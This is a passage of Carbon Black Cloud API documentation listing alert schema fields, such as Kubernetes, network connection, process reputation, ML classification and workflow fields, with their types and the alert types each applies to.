is_updated Set to true if this is an updated copy of the alert initiated by the Carbon Black Cloud backend. User workflow updates, such as adding a note, will generate a new copy of the alert, but is_updated will be set to false. Boolean CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM
k8s_cluster
DEPRECATED
K8s Cluster name String CONTAINER_RUNTIME
k8s_kind
DEPRECATED
K8s Workload kind String CONTAINER_RUNTIME
k8s_namespace
DEPRECATED
K8s namespace String CONTAINER_RUNTIME
k8s_pod_name
DEPRECATED
Name of the pod within a workload String CONTAINER_RUNTIME
k8s_policy
DEPRECATED
Name of the K8s policy String CONTAINER_RUNTIME
k8s_policy_id
DEPRECATED
Unique identifier for the K8s policy String CONTAINER_RUNTIME
k8s_rule
DEPRECATED
Name of the K8s policy rule String CONTAINER_RUNTIME
k8s_rule_id
DEPRECATED
Unique identifier for the K8s policy rule String CONTAINER_RUNTIME
k8s_workload_name
DEPRECATED
K8s Workload Name String CONTAINER_RUNTIME
last_event_timestamp Timestamp when the last event in the alert occurred ISO 8601 UTC timestamp CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM
mdr_alert Is the alert eligible for review by Carbon Black MDR Analysts? Boolean
mdr_alert_notes_present Customer visible notes at the alert level that were added by a MDR analyst Boolean
mdr_determination MDR updatable classification of the alert
{
  "mdr_determination": {
    "change_timestamp": "<string>",
    "value": "<string>"
  }
}
Object
mdr_workflow MDR-updatable workflow of the alert
{
  "mdr_workflow": {
    "change_timestamp": "<string>",
    "status": "<string>",
    "is_assigned": "<boolean>"
  }
}
Object
V2.1.0 ml_classification_anomalies[].anomalous_field The specific field that is exhibiting anomalous behavior; it helps identify the exact area where the anomaly has occurred. (requires Enterprise EDR) String WATCHLIST
V2.1.0 ml_classification_anomalies[].anomalous_field_baseline_values The normal or expected values for the data field; this helps quantify the anomaly’s significance. (requires Enterprise EDR) String[] WATCHLIST
V2.1.0 ml_classification_anomalies[].anomalous_value The actual value that was identified as an anomaly; this value contrasts with the baseline values. (requires Enterprise EDR) String WATCHLIST
V2.1.0 ml_classification_anomalies[].anomaly_name The anomaly’s name. (requires Enterprise EDR) String WATCHLIST
ml_classification_final_verdict Final verdict of the alert, based on the ML models that were used to make the prediction.
NOT_CLASSIFIED
NOT_ANOMALOUS
ANOMALOUS
String WATCHLIST
ml_classification_global_prevalence Categories (low/medium/high) used to describe the prevalence of alerts across all regional organizations.
UNKNOWN
LOW
MEDIUM
HIGH
String WATCHLIST
ml_classification_org_prevalence Categories (low/medium/high) used to describe the prevalence of alerts within an organization.
UNKNOWN
LOW
MEDIUM
HIGH
String WATCHLIST
netconn_local_ip IP address of the remote side of the network connection; stored as dotted decimal String CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME WATCHLIST INTRUSION_DETECTION_SYSTEM
netconn_local_ipv4 IPv4 address of the local side of the network connection; stored as a dotted decimal. Only one of ipv4 and ipv6 fields will be populated. String CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME WATCHLIST INTRUSION_DETECTION_SYSTEM
netconn_local_ipv6 IPv6 address of the local side of the network connection; stored as a string without octet-separating colon characters. Only one of ipv4 and ipv6 fields will be populated. String CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME WATCHLIST INTRUSION_DETECTION_SYSTEM
netconn_local_port TCP or UDP port used by the local side of the network connection Integer CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME WATCHLIST INTRUSION_DETECTION_SYSTEM
netconn_protocol Network protocol of the network connection String CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME WATCHLIST INTRUSION_DETECTION_SYSTEM
netconn_remote_domain Domain name (FQDN) associated with the remote end of the network connection, if available String CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME WATCHLIST INTRUSION_DETECTION_SYSTEM
netconn_remote_ip IP address of the local side of the network connection; stored as dotted decimal String CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME WATCHLIST INTRUSION_DETECTION_SYSTEM
netconn_remote_ipv4 IPv4 address of the remote side of the network connection; stored as dotted decimal. Only one of ipv4 and ipv6 fields will be populated. String CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME WATCHLIST INTRUSION_DETECTION_SYSTEM
netconn_remote_ipv6 IPv6 address of the remote side of the network connection; stored as a string without octet-separating colon characters. Only one of ipv4 and ipv6 fields will be populated. String CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME WATCHLIST INTRUSION_DETECTION_SYSTEM
netconn_remote_port TCP or UDP port used by the remote side of the network connection; same as netconn_port and event_network_remote_port Integer CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME WATCHLIST INTRUSION_DETECTION_SYSTEM
org_key Unique alphanumeric string that identifies your organization in the Carbon Black Cloud String CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM
parent_cmdline Command line of the parent process String CB_ANALYTICS HOST_BASED_FIREWALL WATCHLIST INTRUSION_DETECTION_SYSTEM
parent_effective_reputation Effective reputation of the parent process; applied by the sensor when the event occurred
ADAPTIVE_WHITE_LIST
COMMON_WHITE_LIST
COMPANY_BLACK_LIST
COMPANY_WHITE_LIST
PUP
TRUSTED_WHITE_LIST
RESOLVING
COMPROMISED_OBSOLETE
DLP_OBSOLETE
IGNORE
ADWARE
HEURISTIC
SUSPECT_MALWARE
KNOWN_MALWARE
ADMIN_RESTRICT_OBSOLETE
NOT_LISTED
GRAY_OBSOLETE
NOT_COMPANY_WHITE_OBSOLETE
LOCAL_WHITE
NOT_SUPPORTED
String CB_ANALYTICS HOST_BASED_FIREWALL WATCHLIST INTRUSION_DETECTION_SYSTEM
parent_guid Unique process identifier assigned to the parent process String CB_ANALYTICS HOST_BASED_FIREWALL WATCHLIST INTRUSION_DETECTION_SYSTEM
parent_md5 MD5 hash of the parent process binary String CB_ANALYTICS HOST_BASED_FIREWALL WATCHLIST INTRUSION_DETECTION_SYSTEM
parent_name Filesystem path of the parent process binary String CB_ANALYTICS HOST_BASED_FIREWALL WATCHLIST INTRUSION_DETECTION_SYSTEM
parent_pid Identifier assigned by the operating system to the parent process Integer
parent_reputation Reputation of the parent process; applied by the Carbon Black Cloud when the event is initially processed
ADAPTIVE_WHITE_LIST
COMMON_WHITE_LIST
COMPANY_BLACK_LIST
COMPANY_WHITE_LIST
PUP
TRUSTED_WHITE_LIST
RESOLVING
COMPROMISED_OBSOLETE
DLP_OBSOLETE
IGNORE
ADWARE
HEURISTIC
SUSPECT_MALWARE
KNOWN_MALWARE
ADMIN_RESTRICT_OBSOLETE
NOT_LISTED
GRAY_OBSOLETE
NOT_COMPANY_WHITE_OBSOLETE
LOCAL_WHITE
NOT_SUPPORTED
String CB_ANALYTICS HOST_BASED_FIREWALL WATCHLIST INTRUSION_DETECTION_SYSTEM
parent_sha256 SHA-256 hash of the parent process binary String CB_ANALYTICS HOST_BASED_FIREWALL WATCHLIST INTRUSION_DETECTION_SYSTEM
parent_username User context in which the parent process was executed String CB_ANALYTICS HOST_BASED_FIREWALL WATCHLIST INTRUSION_DETECTION_SYSTEM
policy_applied Indicates whether or not a policy has been applied to any event associated with this alert
APPLIED
NOT_APPLIED
String CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM
primary_event_id ID of the primary event in the alert String CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM
process_cmdline Command line executed by the actor process String CB_ANALYTICS HOST_BASED_FIREWALL WATCHLIST INTRUSION_DETECTION_SYSTEM
process_effective_reputation Effective reputation of the actor hash
ADAPTIVE_WHITE_LIST
COMMON_WHITE_LIST
COMPANY_BLACK_LIST
COMPANY_WHITE_LIST
PUP
TRUSTED_WHITE_LIST
RESOLVING
COMPROMISED_OBSOLETE
DLP_OBSOLETE
IGNORE
ADWARE
HEURISTIC
SUSPECT_MALWARE
KNOWN_MALWARE
ADMIN_RESTRICT_OBSOLETE
NOT_LISTED
GRAY_OBSOLETE
NOT_COMPANY_WHITE_OBSOLETE
LOCAL_WHITE
NOT_SUPPORTED
String CB_ANALYTICS HOST_BASED_FIREWALL WATCHLIST INTRUSION_DETECTION_SYSTEM
process_guid Guid of the process that has fired the alert (optional) String CB_ANALYTICS HOST_BASED_FIREWALL WATCHLIST INTRUSION_DETECTION_SYSTEM
process_issuer The certificate authority associated with the process’s certificate String[] CB_ANALYTICS HOST_BASED_FIREWALL WATCHLIST INTRUSION_DETECTION_SYSTEM
process_md5 MD5 hash of the actor process binary String CB_ANALYTICS HOST_BASED_FIREWALL WATCHLIST INTRUSION_DETECTION_SYSTEM
process_name Process names of an alert String CB_ANALYTICS HOST_BASED_FIREWALL WATCHLIST INTRUSION_DETECTION_SYSTEM
process_pid PID of the process that has fired the alert (optional) Integer
process_publisher Publisher name on the certificate used to sign the Windows or macOS process binary String[] CB_ANALYTICS HOST_BASED_FIREWALL WATCHLIST INTRUSION_DETECTION_SYSTEM
process_reputation Reputation of the actor process; applied when event is processed by the Carbon Black Cloud
ADAPTIVE_WHITE_LIST
COMMON_WHITE_LIST
COMPANY_BLACK_LIST
COMPANY_WHITE_LIST
PUP
TRUSTED_WHITE_LIST
RESOLVING
COMPROMISED_OBSOLETE
DLP_OBSOLETE
IGNORE
ADWARE
HEURISTIC
SUSPECT_MALWARE
KNOWN_MALWARE
ADMIN_RESTRICT_OBSOLETE
NOT_LISTED
GRAY_OBSOLETE
NOT_COMPANY_WHITE_OBSOLETE
LOCAL_WHITE
NOT_SUPPORTED
String CB_ANALYTICS HOST_BASED_FIREWALL WATCHLIST INTRUSION_DETECTION_SYSTEM
process_sha256 SHA-256 hash of the actor process binary String CB_ANALYTICS HOST_BASED_FIREWALL WATCHLIST INTRUSION_DETECTION_SYSTEM
process_username User context in which the actor process was executed. MacOS - all users for the PID for fork() and exec() transitions. Linux - process user for exec() events, but in a future sensor release can be multi-valued due to setuid(). String CB_ANALYTICS HOST_BASED_FIREWALL WATCHLIST INTRUSION_DETECTION_SYSTEM
product_id IDs of the product that identifies USB devices String DEVICE_CONTROL
product_name Names of the product that identifies USB devices String DEVICE_CONTROL
reason A spoken language written explanation of the what and why the alert occurred and any action taken, usually consisting of 1 to 3 sentences. String CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM
reason_code A unique short-hand code or GUID identifying the particular alert reason String CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM
remote_is_private
DEPRECATED
Is the remote information private: true or false Boolean CONTAINER_RUNTIME
remote_k8s_kind
DEPRECATED
Kind of remote workload; set if the remote side is another workload in the same cluster String CONTAINER_RUNTIME
remote_k8s_namespace
DEPRECATED
Namespace within the remote workload’s cluster; set if the remote side is another workload in the same cluster String CONTAINER_RUNTIME
remote_k8s_pod_name
DEPRECATED
Remote workload pod name; set if the remote side is another workload in the same cluster String CONTAINER_RUNTIME
remote_k8s_workload_name
DEPRECATED
Name of the remote workload; set if the remote side is another workload in the same cluster String CONTAINER_RUNTIME
report_description Description of the watchlist report associated with the alert String WATCHLIST
report_id Report IDs that contained the IOC that caused a hit String WATCHLIST
report_link Link of reports that contained the IOC that caused a hit String WATCHLIST
report_name Name of the watchlist report String WATCHLIST
report_tags Tags associated with the watchlist report String[] WATCHLIST
rule_category_id ID representing the category of the rule_id for certain alert types String CB_ANALYTICS HOST_BASED_FIREWALL INTRUSION_DETECTION_SYSTEM
rule_id ID of the rule that triggered an alert; applies to Intrusion Detection System, Host-Based Firewall, TAU Intelligence, and USB Device Control alerts String CB_ANALYTICS HOST_BASED_FIREWALL INTRUSION_DETECTION_SYSTEM
run_state Whether the threat in the alert actually ran
DID_NOT_RUN
RAN
UNKNOWN
String CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM
sensor_action Actions taken by the sensor, according to the rules of a policy
ALLOW
DENY
TERMINATE
String CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM
serial_number Serial numbers of the specific devices String DEVICE_CONTROL
severity integer representation of the impact of alert if true positive Integer CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM
threat_id ID assigned to a group of alerts with common criteria, based on alert type String CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM
threat_name Name of the threat String INTRUSION_DETECTION_SYSTEM
tms_rule_id Detection id String INTRUSION_DETECTION_SYSTEM
ttps Other potential malicious activities involved in a threat String[] CB_ANALYTICS WATCHLIST INTRUSION_DETECTION_SYSTEM
type Type of alert generated
CB_ANALYTICS
WATCHLIST
DEVICE_CONTROL
CONTAINER_RUNTIME
HOST_BASED_FIREWALL
INTRUSION_DETECTION_SYSTEM
NETWORK_TRAFFIC_ANALYSIS
String CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM
user_update_timestamp Timestamp of the last property of an alert changed by a user, such as the alert workflow or determination ISO 8601 UTC timestamp CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM
vendor_id IDs of the vendors who produced the devices String DEVICE_CONTROL
vendor_name Names of the vendors who produced the devices String DEVICE_CONTROL
version The version of the schema being emitted. e.g. 2.1.0 String
watchlists[].id List of watchlists associated with an alert. Alerts are batched hourly
{
            "watchlists": {
              "id": "",
              "name": ""
            }
            }
String WATCHLIST
watchlists[].name List of watchlists associated with an alert. Alerts are batched hourly
{
            "watchlists": {
              "id": "",
              "name": ""
            }
            }
String WATCHLIST
workflow Current workflow state of an alert. The workflow represents the flow from OPEN to IN_PROGRESS to CLOSED and captures who moved the alert into the current state. The history of these state transitions is available via the alert history route.
{
  "workflow": {
    "change_timestamp": "<string>",
    "changed_by": "<string>",
    "changed_by_type": "<string>",
    "changed_by_autoclose_rule_id": "<string>",
    "closure_reason": "<string>",
    "status": "<string>"
  }
}
Object CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM

Last modified on April 21, 2025